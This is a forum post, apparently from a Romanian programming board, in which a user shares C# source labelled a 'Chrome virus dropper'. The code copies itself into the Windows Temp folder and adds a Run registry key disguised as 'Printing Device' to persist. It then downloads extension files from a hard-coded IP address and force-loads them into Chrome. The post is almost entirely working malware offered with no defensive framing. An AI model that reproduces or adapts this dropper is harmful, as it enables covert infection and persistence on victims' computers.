Jump to content
Jako

[C#] Chrome virus dropper - old version

By Jako, in Programare

Recommended Posts

Jako Newbie

Jako

Posted
Posted (edited) 
using System;
using System.Collections.Generic;
using System.Text;
using System.Net;
using System.IO;
using System.Diagnostics;
using System.Runtime.InteropServices;
using Microsoft.Win32;

namespace ChromeSilence
{
    class Program
    {
        [DllImport("user32.dll")]
        public static extern IntPtr FindWindow(string lpClassName, string lpWindowName);

        [DllImport("user32.dll")]
        static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
        static void Main(string[] args)
        {
            string filename = System.Diagnostics.Process.GetCurrentProcess().MainModule.FileName;
            string newfilename = "asg0sdg025scdvx.exe";
            if (File.Exists(@"C:\Windows\Temp\"+filename))
            { }
            else
            {
                try
                {
                    File.Copy(filename, @"C:\Windows\Temp\" + newfilename);
                }
                catch (IOException copyError)
                {
                    Console.WriteLine(copyError.Message);
                }
                
            }
            RegistryKey ax = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
            ax.SetValue("Printing Device", "\"" + @"C:\Windows\Temp\"+newfilename + "\"");
            // check if chrome installed
            string file_one = @"C:\Program Files\Google\Chrome\Application\chrome.exe";
            string file_two = @"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe";
            String temp_path = @"C:\Windows\Temp\chrome_extension";
            String site_url = "http://37.235.55.133/pl/";
            System.IO.Directory.CreateDirectory(temp_path); // create directory
            if (File.Exists(file_one))
            {
                using (WebClient webClient = new WebClient())
                {
                    webClient.DownloadFile(site_url + "manifest.json", temp_path + @"\manifest.json");
                    webClient.DownloadFile(site_url + "main.js", temp_path + @"\main.js");
                    webClient.DownloadFile(site_url + "window.html", temp_path + @"\window.html");
                }
                System.Threading.Thread.Sleep(5000); // sleep for 5 seconds
                Process.Start("chrome.exe", "--load-and-launch-app=" + temp_path);
            }
            if (File.Exists(file_two))
            {
                using (WebClient webClient = new WebClient())
                {
                    webClient.DownloadFile(site_url + "manifest.json", temp_path + @"\manifest.json");
                    webClient.DownloadFile(site_url + "main.js", temp_path + @"\main.js");
                    webClient.DownloadFile(site_url + "window.html", temp_path + @"\window.html");
                }
                System.Threading.Thread.Sleep(5000); // sleep for 5 seconds
                Process.Start("chrome.exe", "--load-and-launch-app=" + temp_path);
            }
        }
    }
}

 

Edited by Jako

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...